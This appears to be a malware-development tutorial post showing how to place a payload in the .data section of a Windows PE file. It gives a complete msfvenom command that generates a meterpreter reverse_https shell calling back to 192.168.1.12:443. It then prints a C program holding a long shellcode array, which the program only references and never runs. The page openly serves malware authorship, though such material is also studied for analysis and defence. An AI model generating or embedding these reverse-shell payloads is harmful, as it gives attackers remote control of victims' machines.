In the Portable Executable (PE) file structure, we malware developers have several options for where to store the payload.

Payload Placement in .data Section

What is the Data Section in the PE File Structure?

First, let’s generate the payload with msfvenom:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\\x00"

image.png

Now let’s write a C program that stores the malicious payload in the .data section of the PE structure:

#include <stdio.h>
#include <stdlib.h>
#include <Windows.h>
// Hello I'm the payload nice to meet you!
// I'm stored at the Data Section Here!
// msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.12 LPORT=443 -f c -v shellcode -b "\\x00"
//
// `shellcode` is an initialized, non-const, external-linkage global, which is
// why the linker places it in the writable .data section (the premise of this
// page). Nothing in this file ever executes it; main() only prints its address.
//
// NOTE(review): the bytes sit in the image exactly as generated, unencrypted
// and unobfuscated, so the blob is a fixed byte pattern that static/signature
// scanning of the .data section can match directly.
// NOTE(review): every escape appears here as "\\x.." (a doubled backslash),
// which looks like an artifact of how this page was rendered: as written, each
// "\\xNN" is four text characters rather than one byte, and the array would not
// be the msfvenom output. Confirm against the original -f c output.
unsigned char shellcode[] =
"\\xb8\\xc9\\xe3\\x83\\xe1\\xdb\\xcc\\xd9\\x74\\x24\\xf4\\x5a\\x31\\xc9"
"\\xb1\\x8a\\x83\\xc2\\x04\\x31\\x42\\x10\\x03\\x42\\x10\\x2b\\x16\\x7f"
"\\x09\\x24\\xd9\\x80\\xca\\x5a\\xeb\\x52\\x43\\x7f\\x6f\\xd8\\x06\\x4f"
"\\xfb\\x8c\\xaa\\x24\\xa9\\x24\\xbc\\x8d\\x04\\x63\\xf3\\x0e\\x13\\x19"
"\\xdb\\xc1\\xe4\\x72\\x27\\x40\\x99\\x88\\x74\\xa2\\xa0\\x42\\x89\\xa3"
"\\xe5\\x14\\xe7\\x4c\\xbb\\x2d\\x55\\x82\\xb7\\x70\\x66\\xa3\\x17\\xff"
"\\xd6\\xdb\\x12\\xc0\\x80\\x6f\\x51\\xc0\\xfe\\x04\\x31\\xe2\\xff\\xc9"
"\\x49\\xaa\\xe7\\xbd\\xc8\\xe2\\x6c\\x01\\xe2\\x0b\\xc5\\xf2\\x30\\x7f"
"\\xd7\\xd2\\x08\\xbf\\x19\\x15\\x67\\x93\\x9b\\x6e\\x40\\x0b\\xee\\x84"
"\\xb2\\xb6\\xe9\\x5f\\xc8\\x6c\\x7f\\x7f\\x6a\\xe6\\x27\\x5b\\x8a\\x2b"
"\\xb1\\x28\\x80\\x80\\xb5\\x76\\x85\\x17\\x19\\x0d\\xb1\\x9c\\x9c\\xc1"
"\\x33\\xe6\\xba\\xc5\\x18\\xbc\\xa3\\x5c\\xc5\\x13\\xdb\\xbe\\xa1\\xcc"
"\\x79\\xb5\\x40\\x1a\\xfd\\x36\\x9b\\x23\\xa3\\xa0\\x0a\\xb9\\x28\\x30"
"\\xbb\\x36\\xb8\\x5e\\x52\\xed\\x52\\xd2\\xd3\\x2b\\xa4\\x15\\xce\\x05"
"\\x71\\xba\\xa2\\x36\\xd6\\x6f\\xad\\xca\\xd8\\x8f\\x2d\\x60\\xb6\\xf5"
"\\x44\\x16\\x24\\x68\\xb8\\xd3\\x9a\\x5a\\xe6\\x33\\xae\\xfb\\x85\\x2a"
"\\x5e\\x8f\\x26\\xde\\xf6\\x54\\x99\\x69\\x69\\xde\\xbc\\x05\\x55\\x53"
"\\x5e\\xb5\\xb5\\x24\\xf3\\x19\\xee\\x9a\\xc2\\x6a\\x51\\xeb\\x0d\\xad"
"\\x2c\\x7b\\x3e\\xc1\\xcb\\x2c\\xdb\\x7b\\x5f\\xbb\\x57\\x53\\x69\\x0b"
"\\xad\\x85\\xa4\\x45\\xfc\\xec\\xe6\\xb1\\xb5\\x46\\xb3\\x8c\\x05\\x7b"
"\\x1b\\x62\\xff\\xe8\\x3e\\x5a\\xb8\\x8b\\xa3\\xf1\\x29\\x7d\\x04\\x53"
"\\xd3\\x0f\\x37\\x32\\x74\\x9e\\x98\\xf5\\xbc\\x70\\xd6\\xd5\\x93\\xed"
"\\x7e\\x74\\x66\\x87\\x51\\x40\\xb6\\x62\\x80\\x9d\\x98\\xbd\\xe9\\xdd"
"\\x8c\\x87\\x47\\xa4\\xeb\\x07\\xb2\\x05\\xa7\\x9d\\x3e\\xfa\\x14\\x0a"
"\\xfa\\xfd\\x9a\\xca\\x14\\x36\\x9a\\xca\\xe4\\xe7\\xee\\xae\\xa7\\x8d"
"\\x4f\\x4c\\x44\\x06\\x40\\xa2\\xd1\\x8c\\xcc\\x80\\xa0\\x1a\\x68\\x36"
"\\x04\\xc3\\x43\\x5f\\xd3\\x47\\x9c\\xf5\\x6b\\x2e\\x94\\x67\\x38\\xd6"
"\\x69\\x2e\\xa7\\x57\\x33\\x94\\x6b\\x0d\\xda\\x70\\x3a\\xe5\\x2a\\xb2"
"\\x88\\x7c\\x2b\\xf1\\x6b\\x24\\x8a\\xb6\\x30\\xe0\\x55\\x7f\\xb7\\x40"
"\\x0e\\x28\\x3e\\xff\\x08\\x29\\x95\\x76\\x52\\x85\\x7e\\x88\\x69\\xc2"
"\\xfb\\xdb\\xde\\x41\\x53\\x88\\xb6\\x0d\\xb0\\x7b\\x19\\xf5\\xb9\\x56"
"\\xf3\\x63\\x4c\\x07\\x94\\xf3\\x63\\xb7\\x64\\x7d\\x63\\xdd\\x60\\x2d"
"\\x0e\\x3e\\x3f\\xa5\\xbb\\x06\\x21\\xb3\\xbb\\x53\\x0e\\xef\\x10\\x08"
"\\xe7\\x67\\xba\\xa8\\x1f\\x03\\x3b\\x61\\x9a\\x33\\xb6\\x9d\\xcd\\x3b"
"\\x2a\\x9d\\x0d\\x54\\x09\\x6d\\x38\\x44\\x6e\\x58\\x0c\\xf1\\x5c\\x8a"
"\\xda\\xf9\\x5e\\x4a\\xb7\\xb9\\x36\\x4a\\x57\\x3a\\xc7\\x22\\x57\\x3a"
"\\x87\\xb2\\x04\\x52\\x5f\\x16\\xf9\\x47\\xa0\\x83\\x6d\\xd4\\x0c\\xa2"
"\\x75\\x8c\\xda\\xb4\\x59\\x33\\x1b\\xe7\\xcf\\x5b\\x09\\x91\\x79\\x79"
"\\xd2\\x48\\xfc\\xbe\\x59\\xbd\\x74\\x39\\xa3\\x82\\x0e\\x86\\xd6\\xe1"
"\\x49\\xc4\\x46\\x01\\x02\\x35\\x87\\x2e\\xe4\\xf0\\x4a\\xfe\\x36\\x35"
"\\x93\\xd0\\x09\\x17\\xd2\\x1e\\x6a\\xdc\\xe4\\xeb\\xc8\\x74\\x6f\\x13"
"\\x5e\\x86\\xba";
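/*
 * Entry point: prints a banner and the address of the `shellcode` global so
 * the blob's location can be compared with what a PE viewer reports for the
 * .data section. The payload is only referenced here, never executed.
 *
 * Returns EXIT_SUCCESS (requires <stdlib.h>).
 */
int main(void)
{
    /* NOTE(review): "\\n" here (and the "\\x" escapes in `shellcode`) reads as
     * a doubled backslash, which looks like a rendering artifact of the page;
     * confirm against the original source. */
    printf("Rem01x Malware Development Journey\\n");
    /* %p is defined only for a pointer to void (C11 7.21.6.1p8); passing an
     * unsigned char * unchanged is undefined behaviour, so cast explicitly.
     * The literal "0x" prefix matches MSVC, whose %p prints bare hex digits;
     * other C runtimes may already prefix "0x" themselves. */
    printf("Hello I'm the Paylaod my address is: 0x%p", (void *)shellcode);
    return EXIT_SUCCESS;
}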

image.png

Now let’s compile the code and open it in PE-bear to have a look at the .data section:

image.png